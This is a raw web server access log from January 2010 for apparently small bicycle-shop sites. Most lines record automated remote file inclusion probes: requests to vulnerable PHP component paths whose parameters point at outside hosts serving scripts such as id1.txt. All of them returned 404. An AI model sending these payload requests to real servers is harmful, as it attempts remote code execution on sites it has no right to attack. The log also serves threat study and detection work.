218.145.29.142 - - [11/Jan/2010:00:27:05 -0800] "GET /administrator/components/com_admin/export.php?mosConfig.absolute.path=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.145.29.142 - - [11/Jan/2010:00:27:05 -0800] "GET /logs/access.log%20%20//administrator/components/com_admin/export.php?mosConfig.absolute.path=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.223.143.131 - - [11/Jan/2010:00:27:56 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.223.143.131 - - [11/Jan/2010:00:27:56 -0800] "GET /logs/access.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.223.143.131 - - [11/Jan/2010:00:27:56 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.223.143.131 - - [11/Jan/2010:00:27:58 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.223.143.131 - - [11/Jan/2010:00:27:58 -0800] "GET /logs/access.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.223.143.131 - - [11/Jan/2010:00:27:58 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
207.191.225.96 - - [11/Jan/2010:00:28:16 -0800] "GET /logs/access.log%20%20//bbs//skin/zero_vote/ask_password.php?dir=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
207.191.225.96 - - [11/Jan/2010:00:28:16 -0800] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
207.191.225.96 - - [11/Jan/2010:00:28:18 -0800] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [11/Jan/2010:00:28:53 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [11/Jan/2010:00:28:53 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [11/Jan/2010:00:28:53 -0800] "GET /logs/access.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [11/Jan/2010:00:29:05 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [11/Jan/2010:00:29:06 -0800] "GET /logs/access.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [11/Jan/2010:00:29:06 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [11/Jan/2010:00:29:37 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [11/Jan/2010:00:29:37 -0800] "GET /logs/access.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [11/Jan/2010:00:29:37 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [11/Jan/2010:00:29:54 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [11/Jan/2010:00:29:54 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [11/Jan/2010:00:29:55 -0800] "GET /logs/access.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
207.191.225.96 - - [11/Jan/2010:00:30:00 -0800] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
207.191.225.96 - - [11/Jan/2010:00:30:02 -0800] "GET /logs/access.log//bbs//skin/zero_vote/ask_password.php?dir=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
207.191.225.96 - - [11/Jan/2010:00:30:02 -0800] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.88.25.28 - - [11/Jan/2010:00:32:03 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; I)" "houstonbikeshop.com"
211.234.122.76 - - [11/Jan/2010:00:34:22 -0800] "GET /delete_all.php?board_skin_path=http://www.olije.com/zbxe/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
211.234.122.76 - - [11/Jan/2010:00:34:22 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.olije.com/zbxe/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
211.234.122.76 - - [11/Jan/2010:00:34:31 -0800] "GET /logs/access.log//delete_all.php?board_skin_path=http://www.olije.com/zbxe/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.56.83 - - [11/Jan/2010:00:34:39 -0800] "GET /administrator/components/com_admin/export.php?mosConfig.absolute.path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.56.83 - - [11/Jan/2010:00:34:39 -0800] "GET /logs//administrator/components/com_admin/export.php?mosConfig.absolute.path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.56.83 - - [11/Jan/2010:00:34:39 -0800] "GET /logs/access.log%20%20//administrator/components/com_admin/export.php?mosConfig.absolute.path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.56.83 - - [11/Jan/2010:00:34:45 -0800] "GET /administrator/components/com_admin/export.php?mosConfig.absolute.path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.56.83 - - [11/Jan/2010:00:34:45 -0800] "GET /logs//administrator/components/com_admin/export.php?mosConfig.absolute.path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.56.83 - - [11/Jan/2010:00:34:45 -0800] "GET /logs/access.log%20%20//administrator/components/com_admin/export.php?mosConfig.absolute.path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.56.83 - - [11/Jan/2010:00:40:56 -0800] "GET /logs//administrator/components/com_admin/export.php?mosConfig.absolute.path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.56.83 - - [11/Jan/2010:00:40:56 -0800] "GET /administrator/components/com_admin/export.php?mosConfig.absolute.path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.56.83 - - [11/Jan/2010:00:40:56 -0800] "GET /logs/access.log%20%20//administrator/components/com_admin/export.php?mosConfig.absolute.path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.56.83 - - [11/Jan/2010:00:40:59 -0800] "GET /administrator/components/com_admin/export.php?mosConfig.absolute.path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.56.83 - - [11/Jan/2010:00:40:59 -0800] "GET /logs//administrator/components/com_admin/export.php?mosConfig.absolute.path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.56.83 - - [11/Jan/2010:00:40:59 -0800] "GET /logs/access.log%20%20//administrator/components/com_admin/export.php?mosConfig.absolute.path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.145.29.142 - - [11/Jan/2010:00:44:09 -0800] "GET /administrator/components/com_admin/export.php?mosConfig.absolute.path=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.145.29.142 - - [11/Jan/2010:00:44:09 -0800] "GET /logs//administrator/components/com_admin/export.php?mosConfig.absolute.path=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.145.29.142 - - [11/Jan/2010:00:44:09 -0800] "GET /logs/access.log%20%20//administrator/components/com_admin/export.php?mosConfig.absolute.path=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.55.207.71 - - [11/Jan/2010:00:48:52 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
207.191.225.96 - - [11/Jan/2010:00:49:43 -0800] "GET /kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
207.191.225.96 - - [11/Jan/2010:00:49:45 -0800] "GET /logs/access.log%20%20//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
207.191.225.96 - - [11/Jan/2010:00:49:45 -0800] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.88.25.28 - - [11/Jan/2010:00:52:53 -0800] "GET /tmp/ HTTP/1.1" 200 659 "-" "Yandex/1.01.001 (compatible; Win16; I)" "bicyclestoreshouston.com"
77.221.130.13 - - [11/Jan/2010:00:53:26 -0800] "GET /appserv/main.php?appserv_root=http://paroleproibite.com/administrator/components/com_settings/image1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.221.130.13 - - [11/Jan/2010:00:53:26 -0800] "GET /logs/access.log%20%20/appserv/main.php?appserv_root=http://paroleproibite.com/administrator/components/com_settings/image1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.221.130.13 - - [11/Jan/2010:00:53:26 -0800] "GET /logs/appserv/main.php?appserv_root=http://paroleproibite.com/administrator/components/com_settings/image1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.55.207.71 - - [11/Jan/2010:00:55:20 -0800] "GET /blog/ HTTP/1.1" 401 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
77.221.130.13 - - [11/Jan/2010:01:02:35 -0800] "GET /logs/access.log/appserv/main.php?appserv_root=http://paroleproibite.com/administrator/components/com_settings/image1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
201.218.228.226 - - [11/Jan/2010:01:05:06 -0800] "GET /appserv/main.php?appserv_root=http://paroleproibite.com/administrator/components/com_settings/image1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
201.218.228.226 - - [11/Jan/2010:01:05:06 -0800] "GET /logs/appserv/main.php?appserv_root=http://paroleproibite.com/administrator/components/com_settings/image1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
201.218.228.226 - - [11/Jan/2010:01:05:10 -0800] "GET /logs/access.log%20%20/appserv/main.php?appserv_root=http://paroleproibite.com/administrator/components/com_settings/image1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [11/Jan/2010:01:09:11 -0800] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [11/Jan/2010:01:09:11 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [11/Jan/2010:01:09:12 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [11/Jan/2010:01:15:54 -0800] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [11/Jan/2010:01:15:54 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [11/Jan/2010:01:15:54 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.56.83 - - [11/Jan/2010:01:17:48 -0800] "GET /vwar/convert/mvcw.php?step=1&vwar_root=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.56.83 - - [11/Jan/2010:01:17:48 -0800] "GET /logs/access.log%20%20//vwar/convert/mvcw.php?step=1&vwar_root=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.56.83 - - [11/Jan/2010:01:17:48 -0800] "GET /logs//vwar/convert/mvcw.php?step=1&vwar_root=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.56.83 - - [11/Jan/2010:01:23:18 -0800] "GET /vwar/convert/mvcw.php?step=1&vwar_root=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.56.83 - - [11/Jan/2010:01:23:19 -0800] "GET /logs/access.log%20%20//vwar/convert/mvcw.php?step=1&vwar_root=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.56.83 - - [11/Jan/2010:01:23:19 -0800] "GET /logs//vwar/convert/mvcw.php?step=1&vwar_root=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [11/Jan/2010:01:27:48 -0800] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [11/Jan/2010:01:27:48 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [11/Jan/2010:01:27:49 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [11/Jan/2010:01:31:14 -0800] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [11/Jan/2010:01:31:14 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [11/Jan/2010:01:31:14 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [11/Jan/2010:01:31:41 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [11/Jan/2010:01:31:41 -0800] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [11/Jan/2010:01:31:41 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
79.170.45.126 - - [11/Jan/2010:01:35:00 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
79.170.45.126 - - [11/Jan/2010:01:35:00 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
79.170.45.126 - - [11/Jan/2010:01:35:00 -0800] "GET /logs/access.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
79.170.45.126 - - [11/Jan/2010:01:35:01 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
79.170.45.126 - - [11/Jan/2010:01:35:01 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
79.170.45.126 - - [11/Jan/2010:01:35:01 -0800] "GET /logs/access.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [11/Jan/2010:01:35:03 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.134.249.164/intranet/b1tchXs4f3.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.61 (Macintosh; I; PPC)" "houstonbikeshop.com"
65.23.156.168 - - [11/Jan/2010:01:35:03 -0800] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.134.249.164/intranet/b1tchXs4f3.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.61 (Macintosh; I; PPC)" "houstonbikeshop.com"
65.23.156.168 - - [11/Jan/2010:01:35:03 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.134.249.164/intranet/b1tchXs4f3.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.61 (Macintosh; I; PPC)" "houstonbikeshop.com"
65.23.156.168 - - [11/Jan/2010:01:35:37 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [11/Jan/2010:01:35:37 -0800] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [11/Jan/2010:01:35:37 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [11/Jan/2010:01:35:40 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [11/Jan/2010:01:35:40 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [11/Jan/2010:01:35:40 -0800] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
201.218.228.226 - - [11/Jan/2010:01:41:49 -0800] "GET /logs/access.log/appserv/main.php?appserv_root=http://paroleproibite.com/administrator/components/com_settings/image1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.120.14.42 - - [11/Jan/2010:01:43:12 -0800] "GET /error.php?dir=http://www.anabolex.com/gallery/uploads/34972/RippeR/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.120.14.42 - - [11/Jan/2010:01:43:12 -0800] "GET /logs/error.php?dir=http://www.anabolex.com/gallery/uploads/34972/RippeR/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.120.14.42 - - [11/Jan/2010:01:43:12 -0800] "GET /logs/access.log%20%20/error.php?dir=http://www.anabolex.com/gallery/uploads/34972/RippeR/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [11/Jan/2010:01:44:30 -0800] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [11/Jan/2010:01:44:30 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [11/Jan/2010:01:44:30 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
79.170.45.126 - - [11/Jan/2010:01:50:52 -0800] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
79.170.45.126 - - [11/Jan/2010:01:51:07 -0800] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
209.172.33.230 - - [11/Jan/2010:02:05:07 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.ngamc.com//modules/Forums/admin/bash/icon/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
209.172.33.230 - - [11/Jan/2010:02:05:07 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.ngamc.com//modules/Forums/admin/bash/icon/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
209.172.33.230 - - [11/Jan/2010:02:05:07 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.ngamc.com//modules/Forums/admin/bash/icon/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.221.130.13 - - [11/Jan/2010:02:08:17 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.bla-squad.co.uk/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.221.130.13 - - [11/Jan/2010:02:08:29 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.bla-squad.co.uk/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.221.130.13 - - [11/Jan/2010:02:08:29 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.bla-squad.co.uk/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.195.37.114 - - [11/Jan/2010:02:17:41 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
67.195.37.114 - - [11/Jan/2010:02:17:41 -0800] "GET /logs/ HTTP/1.0" 200 2352 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
83.167.62.171 - - [11/Jan/2010:02:24:14 -0800] "GET /translations/Spanish.txt HTTP/1.1" 200 28587 "-" "Mozilla/5.0 (compatible; Exabot/3.0 (BiggerBetter); +http://www.exabot.com/go/robot)" "svbikes.com"
